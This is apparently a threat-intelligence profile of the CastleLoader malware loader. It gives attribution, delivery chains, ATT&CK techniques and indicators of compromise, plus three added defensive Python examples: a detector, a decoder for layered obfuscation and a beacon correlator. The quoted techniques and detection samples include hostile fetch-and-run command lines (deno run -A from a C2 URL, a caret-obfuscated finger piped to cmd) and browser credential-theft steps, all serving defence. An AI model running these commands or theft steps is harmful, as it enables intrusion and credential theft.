CastleLoader
CastleLoader is a modular malware loader sold under a malware-as-a-service model and used by multiple affiliates and threat clusters. Reporting links it most consistently to the actor tracked as GrayBravo, formerly TAG-150, and some research also notes overlaps with MuddyWater through shared code-signing certificates and delivery chains involving FakeSet. It has been used in campaigns targeting government entities, U.S. government agencies, critical infrastructure, IT firms, logistics companies, and multiple other industries.
Observed delivery vectors include ClickFix social-engineering chains, bogus GitHub and SourceForge repositories, fake installers, Deno-based multi-stage chains, NSIS installers, and infection flows using Inno Setup and AutoIt. Multiple reports describe users being tricked into executing commands copied from fake CAPTCHA or software-installation pages. CastleLoader has also been delivered by FakeSet and used in chains that ultimately deploy LummaC2, NetSupport RAT, Rhadamanthys, StealC, RedLine, DeerStealer, SectopRAT, and CastleRAT; one report also describes an in-memory .NET stealer dubbed CastleStealer delivered as a task from CastleLoader.
Technically, CastleLoader is described as a stealthy first-stage loader focused on flexible payload deployment and in-memory execution. Reported behaviors include configuration decryption in heap memory, RC4-encrypted next-stage retrieval, ChaCha20- or ChaCha-encrypted C2 traffic, custom serialized tasking, host profiling, anti-VM checks, optional screenshot capture, installed-AV enumeration, and execution-status reporting. Specific analyses describe hashed API resolution, XOR-obfuscated strings, reflective PE loading, direct ntdll syscall usage, ReplaceTextW callback execution, process hollowing, and geofencing or language/location checks. It has been observed collecting host metadata such as username, computer name, domain name, Windows version, architecture, and antivirus products before requesting tasks.
Infrastructure and indicators directly mentioned in the reporting include C2 domains and URLs such as maybedontbanplease[.]com, trindastal[.]com, sedaliarealty[.]net, and historical infrastructure at 94[.]159[.]113[.]32 and 38[.]180[.]136[.]139. One report states CastleLoader used the User-Agent string "GoogeBot". Additional indicators include campaign UUID b47e1791-82ba-544f-9aab-ebbdd36d8c89, auth token D63TnQ3WhSnjI0yVKaILRu8U1WttdnE, instance ID YvAPcF0OnjSYuDW7QosQ, hardcoded ChaCha20 key f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb, nonce bbbbf632514c0caae655b2c4, and sample hash bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92 for the CastleLoader core. Related certificate artifacts mentioned in reporting include the Common Names Amy Cherne and Donald Gay, and an EV-signed NSIS sample using a certificate issued to SERPENTINE SOLAR LIMITED.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Threat actor TAG-150 has advanced its CastleLoader malware operations with the development of a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment.
Another malware family linked to MuddyWater is a downloader called FakeSet, which the security researchers say was used in recent infections to deliver CastleLoader. CastleLoader is sold as a service to multiple affiliates and cyber crews.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Techniques & procedures
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
The campaign employs a multi-stage phishing delivery chain that impersonates trusted employment and professional networking platforms, such as LinkedIn and Indeed, to lure victims.
The attack chain begins with phishing URLs hosted on typosquatted domains impersonating legitimate job and professional networking platforms such as LinkedIn and Indeed.
Execution
8 techniques
The first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
They instruct the operator to open the Windows Run dialog box or PowerShell terminal and cut and paste malware code into the system to "fix" the problem.
The initial payload is executed using a command that invokes cmd.exe with a minimized window and uses process output from the caret-obfuscated finger utility.
Lastly, the renamed Python interpreter will be used to execute inline Python code.
The following stage is executed with the downloaded Deno executable: ... deno.exe run -A http://{C2}/{random_path}.js
In this case, the bytecode file is another in-memory loader that uses the Windows ctypes interface to execute shellcode received from a local named pipe.
When the user interacts with the fake CAPTCHA box, a payload gets copied to the clipboard via the classic document.execCommand("copy") method.
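The execution artefacts quoted above (a minimised cmd.exe hiding finger.exe behind caret escapes, deno.exe run -A pulling a remote script, and the renamed curl.exe copy under %LocalAppData% described under Stealth below) translate directly into process-creation checks. The following is an added example written for this page, not code from the original page or from any vendor; the events it runs over are constructed, and the rule names, field names and sample paths are assumptions.

```python
"""Toy detection pass over constructed Windows process-creation events.

Added example (not from the original page or any vendor report). It encodes
three execution artefacts the quoted analyses describe as checks that could
back a Sigma rule:
  1. cmd.exe started minimised whose command line hides finger behind
     caret (^) escapes,
  2. deno.exe run -A with a remote http(s) script,
  3. a digits-only .com/.exe directly under %LocalAppData% whose original
     file name is curl.exe (the renamed curl copy described under Stealth).
Every event below is constructed, not captured telemetry.
"""
import re

EVENTS = [  # constructed sample events: image, command line, PE original file name
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /min /c "f^in^ger user@198.51.100.7 | cmd"',
     "original_file_name": "Cmd.Exe"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\deno.exe",
     "cmdline": r"deno.exe run -A http://203.0.113.9/ab12cd.js",
     "original_file_name": "deno.exe"},
    {"image": r"C:\Users\alice\AppData\Local\1006326830900030409.com",
     "cmdline": r"1006326830900030409.com -s -o runtime.zip https://upstream.example/python-embed.zip",
     "original_file_name": "curl.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir",
     "original_file_name": "Cmd.Exe"},
]


def decaret(cmdline: str) -> str:
    """cmd.exe drops '^' escapes before parsing, so normalise the same way."""
    return cmdline.replace("^", "")


def caret_obfuscated_finger(ev: dict) -> bool:
    """cmd.exe whose line only reveals 'finger' after caret removal."""
    cmd = ev["cmdline"]
    if "^" not in cmd:
        return False
    plain = decaret(cmd).lower()
    return (ev["image"].lower().endswith("cmd.exe")
            and re.search(r"\bfinger(\.exe)?\b", plain) is not None)


def minimized(ev: dict) -> bool:
    """cmd.exe /min (minimised window), case-insensitive."""
    return re.search(r"(?i)\s/min\b", ev["cmdline"]) is not None


def deno_remote_run(ev: dict) -> bool:
    """deno.exe run -A <http(s) URL>: all permissions, script fetched remotely."""
    cmd = ev["cmdline"].lower()
    return (ev["image"].lower().endswith("deno.exe")
            and re.search(r"\brun\b.*\s-a\s+https?://", cmd) is not None)


# Digits-only basename with .com/.exe directly under ...\AppData\Local\
LOCALAPPDATA_NUMERIC_RE = re.compile(r"(?i)\\appdata\\local\\\d{10,}\.(com|exe)$")


def renamed_curl(ev: dict) -> bool:
    """Renamed copy of curl.exe: PE original name survives the rename."""
    return (ev["original_file_name"].lower() == "curl.exe"
            and LOCALAPPDATA_NUMERIC_RE.search(ev["image"]) is not None)


RULES = {
    "caret_obfuscated_finger_from_minimised_cmd":
        lambda ev: caret_obfuscated_finger(ev) and minimized(ev),
    "deno_run_remote_script": deno_remote_run,
    "renamed_curl_in_localappdata": renamed_curl,
}


def evaluate(events: list) -> list:
    """Return (event_index, rule_name) pairs for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, name in evaluate(EVENTS):
        print(f"event {idx}: {name}")
```

The PE original file name check is what makes the renamed-curl rule robust: the on-disk name is random, but the version resource inside the copied binary still says curl.exe, and most EDR process-creation events expose that field.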
Persistence
2 techniques
The first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
Privilege Escalation
5 techniques
The first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
startup_method: persistence mechanism, 1=Registry Run, 2=Startup LNK, 3=Scheduled Task
run_as_admin: the malware relaunches its parent via cmd.exe /c <parent_process> through ShellExecuteW with the "runas" verb to elevate it as Administrator.
Stealth
9 techniques
The payload downloaded by the renamed Python interpreter is another Python script that performs a Cyrillic substitution operation. Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents.
The malware generates a randomized filename under %LocalAppData% directory and assigns it as a disguised executable path (e.g. 1006326830900030409.com or 1006326830900030409.exe). Next, this file is then used as a renamed copy of the legitimate Windows curl.exe binary.
This directory is also created under %LocalAppData% and mimics a legitimate Python installation structure, depending on the runtime variant being used (embedded CPython or IronPython).
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Embedded JavaScript dynamically fetches remote content from this endpoint, applies ROT13 to decode the response... Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents... using Base64 encoding, XOR decryption... The first 64 bytes of the downloaded blob are treated as the RC4 key... all C2 communication is encrypted via the symmetric ChaCha algorithm.
Despite differences in tooling and runtime selection, both variants follow the same overall execution chain, including LOLBin abuse, portable Python runtime deployment, staged payload retrieval, and in-memory execution of the next-stage malware payload.
anti_vm: run the cpuid instruction to attempt to detect hypervisor (VMware, VirtualBox, Parallels) environments.
After substituting and decoding the Base64 blobs, this Python script implements a classic fileless shellcode, using Base64 encoding, XOR decryption, and direct Windows API calls via ctypes to execute payloads entirely in memory.
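The obfuscation layers quoted above (ROT13 on the fetched response, Cyrillic-to-Latin homoglyph substitution before Base64 decoding, XOR on the decoded bytes, and RC4 with the first 64 bytes of the downloaded blob used as the key) are each trivial on their own; what an analyst needs is a decoder that peels them in the right order. The block below is an added example for this page, not the page's own code and not any vendor's tooling. The homoglyph table, the XOR key, the RC4 key and all sample inputs are constructed for the demo (a real sample carries its own table and keys), and the small forward-direction builder exists only to produce a self-contained test input.

```python
"""Analyst decoder for the layered obfuscation described above.

Added example (not from the page, nor any vendor's tooling). It reverses
the layers the quoted analyses name:
  ROT13 on fetched text -> Cyrillic-to-Latin homoglyph substitution ->
  Base64 -> repeating-key XOR
and, for the downloaded binary blob, RC4 keyed with the blob's first 64 bytes.
The homoglyph table, keys and sample inputs are constructed for the demo.
"""
import base64

# Constructed homoglyph pairs (Cyrillic letter, Latin look-alike). A real
# script ships its own mapping; substitute it here when analysing a sample.
_PAIRS = [("А", "A"), ("В", "B"), ("Е", "E"), ("К", "K"), ("М", "M"), ("Н", "H"),
          ("О", "O"), ("Р", "P"), ("С", "C"), ("Т", "T"), ("Х", "X"),
          ("а", "a"), ("е", "e"), ("о", "o"), ("р", "p"), ("с", "c"),
          ("х", "x"), ("у", "y")]
CYRILLIC_TO_LATIN = {ord(c): l for c, l in _PAIRS}
LATIN_TO_CYRILLIC = {ord(l): c for c, l in _PAIRS}   # demo builder only


def rot13(text: str) -> str:
    """ROT13 over ASCII letters only; every other character passes through."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + 13) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + 13) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def substitute_homoglyphs(text: str) -> str:
    """Map Cyrillic look-alikes back to the Latin Base64 alphabet."""
    return text.translate(CYRILLIC_TO_LATIN)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_script_layers(blob: str, xor_key: bytes) -> bytes:
    """Homoglyph fix -> Base64 -> XOR, as in the quoted Python stage."""
    return xor_bytes(base64.b64decode(substitute_homoglyphs(blob)), xor_key)


def decode_fetched_response(response: str, xor_key: bytes) -> bytes:
    """ROT13 the fetched text first, then run the script-stage layers."""
    return decode_script_layers(rot13(response), xor_key)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_key_prefixed_blob(blob: bytes, key_len: int = 64) -> bytes:
    """First key_len bytes are the RC4 key, the remainder the ciphertext."""
    if len(blob) <= key_len:
        raise ValueError("blob too short to carry a key prefix")
    return rc4(blob[:key_len], blob[key_len:])


def build_demo_inputs():
    """Apply the layers forward to construct sample inputs (demo only)."""
    xor_key = b"\x5a"                                  # constructed key
    stage = b"print('next stage')"                     # constructed plaintext
    b64 = base64.b64encode(xor_bytes(stage, xor_key)).decode()
    response = rot13(b64.translate(LATIN_TO_CYRILLIC))  # homoglyphs, then ROT13
    rc4_key = bytes(range(64))                         # constructed 64-byte key
    blob = rc4_key + rc4(rc4_key, b"PK\x03\x04demo-zip-bytes")
    return response, xor_key, blob


if __name__ == "__main__":
    resp, key, blob = build_demo_inputs()
    print(decode_fetched_response(resp, key))
    print(decrypt_key_prefixed_blob(blob)[:4])
```

The order matters: ROT13 must run before the homoglyph fix, because the Cyrillic characters are outside ROT13's alphabet and would otherwise be restored to Latin letters that then get rotated. The `decrypt_key_prefixed_blob` output in the real chain is a ZIP archive (the quoted analyses note the buffer resolves to one), so checking for the `PK` magic is a quick sanity test that the key prefix length was right.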
Credential Access
2 techniques
For Chromium-family browsers the stealer reads Login Data ... cookies.sqlite ... Discord is targeted ... Telegram sessions are stolen wholesale by copying the entire tdata directory.
For Chromium-family browsers the stealer reads Login Data (the SQLite password store), cookies.sqlite, and Local State ... CryptUnprotectData specifically to decrypt it.
Discovery
3 techniques
The loader issues a get_tasks request to its C2 server using generated identifiers of the infected host... along with system profiling data (username, computer_name, domain_name, windows_version, arch, active_av and active_list).
anti_vm: run the cpuid instruction to attempt to detect hypervisor (VMware, VirtualBox, Parallels) environments.
get_installed_av: enumerate installed AV products via WMI root\SecurityCenter2 using CoCreateInstance and CoSetProxyBlanket
Collection
3 techniques
make_screenshots: capture the desktop on bootstrap via the GDI BitBlt pipeline
When the user checks the "I'm not a robot" box, two things happen. First, a payload gets copied to the clipboard via the classic document.execCommand("copy").
After decryption, the buffer resolves with a ZIP archive containing the resources of the final payload.
Command and Control
4 techniques
The resulting decompressed payload reveals behavior consistent with secondary-stage command-and-control (C2) activity. It initiates outbound connections to retrieve additional payloads...
For the initial configuration fetch, the malware issues a GET request to a hardcoded base URL... the loader contacts only the base endpoint and transmits encrypted data within the HTTP POST request body.
Finally, the renamed curl.exe binary is used again to download a legitimate Python runtime archive from trusted upstream sources.
Apart from the malware's initial GET request, all C2 communication is encrypted via the symmetric ChaCha algorithm.
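The C2 shape quoted above is distinctive on the wire even though the payloads are ChaCha-encrypted: a single GET to a hardcoded base URL, then repeated POSTs to exactly that base endpoint with an opaque body, from the same host. That sequence can be correlated in proxy or egress logs without decrypting anything. The following is an added example written for this page, not the page's own code or any vendor's detection content; the "GoogeBot" User-Agent is the string one report attributes to CastleLoader, while the hosts, URLs, timings and body sizes are constructed.

```python
"""Stateful beacon correlation over constructed HTTP egress records.

Added example (not from the original page or any vendor's detection
content). For each source host it looks for one GET to a base-only URL
followed, within a time window, by POSTs to that same base endpoint that
carry a non-empty body. "GoogeBot" is the User-Agent one report attributes
to CastleLoader; everything else here is constructed.
"""
from collections import defaultdict
from urllib.parse import urlsplit

SUSPICIOUS_UA = "GoogeBot"   # from public reporting on this family

# Constructed proxy records: (seconds, src_host, method, url, user_agent, bytes_out)
EVENTS = [
    (0,   "ws01", "GET",  "http://c2.example/",             SUSPICIOUS_UA, 0),
    (5,   "ws01", "POST", "http://c2.example/",             SUSPICIOUS_UA, 412),
    (65,  "ws01", "POST", "http://c2.example/",             SUSPICIOUS_UA, 398),
    (125, "ws01", "POST", "http://c2.example/",             SUSPICIOUS_UA, 401),
    (3,   "ws02", "GET",  "http://intranet.example/",       "Mozilla/5.0", 0),
    (9,   "ws02", "POST", "http://intranet.example/login",  "Mozilla/5.0", 120),
    (40,  "ws02", "POST", "http://intranet.example/login",  "Mozilla/5.0", 118),
]


def base_endpoint(url: str) -> str:
    """scheme://host/ with path, query and fragment stripped."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}/"


def is_base_only(url: str) -> bool:
    """True when the request targets nothing but the base endpoint."""
    p = urlsplit(url)
    return p.path in ("", "/") and not p.query


def correlate(events, window: int = 600, min_posts: int = 2) -> dict:
    """Return {src_host: finding} for hosts showing the GET-then-POST shape.

    A finding records the base endpoint, how many qualifying POSTs followed
    the GET inside `window` seconds, and whether the reported User-Agent
    appeared on any request in the sequence.
    """
    by_host = defaultdict(list)
    for ev in sorted(events):            # chronological per host
        by_host[ev[1]].append(ev)

    findings = {}
    for host, evs in by_host.items():
        for idx, (t0, _, method, url, _, _) in enumerate(evs):
            if method != "GET" or not is_base_only(url):
                continue
            base = base_endpoint(url)
            posts = [e for e in evs[idx + 1:]
                     if e[2] == "POST" and e[3] == base
                     and e[0] - t0 <= window and e[5] > 0]
            if len(posts) >= min_posts:
                seq = [evs[idx]] + posts
                findings[host] = {
                    "base": base,
                    "posts": len(posts),
                    "suspicious_ua": any(e[4] == SUSPICIOUS_UA for e in seq),
                }
                break                    # one finding per host is enough
    return findings


def ua_hits(events) -> list:
    """Hosts that sent the reported User-Agent at all (a direct IoC match)."""
    return sorted({e[1] for e in events if e[4] == SUSPICIOUS_UA})


if __name__ == "__main__":
    for host, f in correlate(EVENTS).items():
        print(host, f)
    print("UA matches:", ua_hits(EVENTS))
```

The POST-to-base check is what separates this from ordinary web traffic: browsers and legitimate clients POST to a resource path (ws02's /login above), while the quoted loader posts its encrypted body to the bare endpoint. Pair the sequence finding with the User-Agent match when it is present, but do not depend on it, since a string like that is trivially changed between builds.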
Exfiltration
1 technique
...a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment...
IOCs tracked for this family
112 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
41 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A fileless Malware-as-a-Service loader used in the ClickFix campaign to retrieve configuration, communicate with C2 using ChaCha20 and RC4-based mechanisms, execute tasks, and deliver next-stage payloads including a Python-based RAT.
A malware loader delivered through a Deno-based multi-stage infection chain using the ClickFix lure.
A malware loader observed being delivered through a Deno-based multi-stage infection chain involving the ClickFix lure.
A multi-stage malware loader delivered via a ClickFix-style social engineering chain. It uses finger.exe, BYOI with a legitimate Python embed package, shellcode, reflective PE loading, encrypted C2 traffic, tasking, persistence options, screenshot capture, and multiple launch methods to deliver follow-on payloads including NetSupport RAT and a stealer.